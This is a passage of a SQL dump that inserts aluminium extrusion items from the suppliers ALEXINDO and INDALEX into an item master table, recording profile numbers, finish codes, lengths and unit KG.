'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0019', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'NA', '4186', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0020', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '4186', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0021', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'MF', '4186', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0022', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3840', null, null, 'MF', '4186', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0023', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'MF', '4186', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0024', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '4186', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0025', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'NA', '4194', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0026', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '4194', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0027', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'NA', '4194', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0028', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'MF', '4199', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0029', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3850', null, null, 'MF', '4367', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0030', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'MF', '4372', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0031', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '4374', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0032', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'MF', '4374', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0033', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '4393', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0034', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '4396', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0035', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '4396', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0036', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3890', null, null, 'NA', '4396', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0037', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'NA', '4396', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0038', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'BA', '4397', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0039', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '4397', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0040', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'MF', '4397', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0041', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '4399', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0042', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '4441', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0043', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'NA', '4441', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0044', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'MF', '4443', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0045', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3850', null, null, 'BA', '4446', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0046', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '4446', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0047', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'NA', '4446', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0048', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'NA', '4446', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0049', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '4446', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0050', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '4446', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0051', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '4447', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0052', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3930', null, null, 'MF', '4449', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0053', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '4449', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0054', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '4449', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0055', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '4449', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0056', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1000', null, null, 'MF', '4450', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0057', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3920', null, null, 'MF', '4451', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0058', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'MF', '4451', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0059', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3920', null, null, 'MF', '4452', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0060', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '4452', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0061', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3840', null, null, 'MF', '4454', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0062', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '4454', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0063', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'NA', '4460', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0064', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '4461', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0065', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3880', null, null, 'MF', '4464', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0066', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3890', null, null, 'MF', '4464', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0067', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'MF', '4464', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0068', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '4465', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0069', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3920', null, null, 'MF', '4466', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0070', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'NA', '4467', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0071', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'NA', '4467', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0072', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'MF', '4468', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0073', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'BA', '4471', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0074', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'MF', '4471', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0075', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '4471', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0076', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3500', null, null, 'NA', '4472', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0077', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3570', null, null, 'NA', '4472', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0078', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3680', null, null, 'NA', '4472', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0079', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2390', null, null, 'MF', '4474', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0080', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2620', null, null, 'MF', '4474', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0081', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2840', null, null, 'MF', '4474', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0082', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '4474', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0083', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '4476', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0084', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '4477', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0085', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '4477', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0086', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'BA', '4478', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0087', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'MF', '4478', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0088', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3520', null, null, 'BA', '4479', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0089', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '4480', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0090', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'BA', '9401', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0091', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '9401', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0092', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'MF', '9401', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0093', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3880', null, null, 'MF', '9403', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0094', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3880', null, null, 'MF', '9404', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0095', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'BA', '9405', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0096', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3930', null, null, 'BA', '9406', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0097', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3880', null, null, 'NA', '9407', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0098', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'MF', '9407', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0099', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '9409', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0100', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2520', null, null, 'NA', '9411', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0101', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4090', null, null, 'NA', '9412', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0102', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '9413', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0103', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2990', null, null, 'NA', '9414', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0104', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9416', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0105', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'MF', '9417', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0106', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '9417', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0107', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3920', null, null, 'MF', '9419', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0108', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'MF', '9419', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0109', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'BA', '9420', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0110', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'BA', '9420', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0111', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '9420', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0112', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '9420', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0113', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'MF', '9420', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0114', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '9420', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0115', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9422', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0116', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '9422', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0117', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'BA', '9427', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0118', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'MF', '9427', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0119', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1330', null, null, 'MF', '9428', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0120', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3150', null, null, 'NA', '9429', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0121', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3920', null, null, 'NA', '9429', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0122', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'NA', '9430', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0123', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '9430', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0124', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4040', null, null, 'NA', '9430', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0125', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'BA', '9431', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0126', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'BA', '9432', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0127', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3970', null, null, 'NA', '9433', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0128', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'MF', '9434', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0129', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4090', null, null, 'MF', '9434', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0130', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'NA', '9438', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0131', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '9439', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0132', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'NA', '4126R', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0133', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3840', null, null, 'MF', '4459R', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0134', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '4459R', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0135', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'BA', '9402R', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0136', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'MF', '4471', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0137', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'MF', '4464', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REA-0138', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'BA', '9405', 'KG', null, '', '', 'ALEXINDO'); INSERT INTO mst_barang VALUES ('REI-0001', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3790', null, null, 'NA 10 MC', '4273', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0002', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4400', null, null, 'NA 10 MC', '4274', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0003', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '1330', null, null, 'MF', '6819', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0004', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'BA', '8271', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0005', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2050', null, null, 'MF', '8490', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0006', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2010', null, null, 'MF', '8490', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0007', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '8610', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0008', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2050', null, null, 'NA', '8610', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0009', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '8610', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0010', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'MF', '8615', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0011', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'MF', '8616', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0012', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'NA', '8618', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0013', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'NA', '8618', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0014', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '8618', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0015', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'NA', '8618', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0016', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'MF', '8619', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0017', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3840', null, null, 'NA', '8620', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0018', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3840', null, null, 'MF', '8620', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0019', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '2000', null, null, 'MF', '8620', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0020', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'MF', '8623', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0021', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4070', null, null, 'BA', '8624', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0022', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'BA', '8624', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0023', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'BA', '8626', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0024', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '8626', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0025', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3960', null, null, 'MF', '8628', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0026', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4010', null, null, 'MF', '8629', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0027', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3940', null, null, 'MF', '8630', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0028', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'NA', '8631', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0029', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3980', null, null, 'MF', '8631', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0030', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '8634', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0031', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '8635', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0032', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '8635', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0033', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3990', null, null, 'MF', '8635', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0034', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '8637', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0035', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3950', null, null, 'NA', '8638', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0036', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '3900', null, null, 'NA', '8638', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0037', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'BA', '8639', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0038', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'NA', '8639', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0039', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '8640', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang VALUES ('REI-0040', '1', 'RAE', '', 'EXTRUSION', '', '', null, null, null, '4000', null, null, 'MF', '8644', 'KG', null, '', '', 'INDALEX'); INSERT INTO mst_barang 